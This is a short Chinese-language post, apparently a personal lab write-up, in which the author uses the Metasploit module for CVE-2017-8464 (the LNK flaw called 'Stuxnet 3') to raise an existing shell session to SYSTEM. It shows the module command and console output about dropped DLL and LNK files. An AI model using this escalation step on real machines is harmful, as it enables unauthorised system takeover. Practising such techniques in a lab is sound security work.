cve_2017_8464_lnk_lpe,他就是震网三代的exploit
上次没有成功将x64的搞定,现在搬来了震网三代
看我来个远程执行漏洞的提权
前面已经拿到shell,但没有system权限
我也是稍微找了以下exploit,真是大海捞针
偶然发现
use exploit/windows/local/cve_2017_8464_lnk_lpe
设置好sessions,直接把权限提到system
可怕,视乎还删除了什么
[!] Tried to delete C:\Users\hack\ruwkHlybgqtAAonb.dll, unknown result
[!] Tried to delete C:\Users\hack\gqSvmAVDKpXoSASr.lnk, unknown result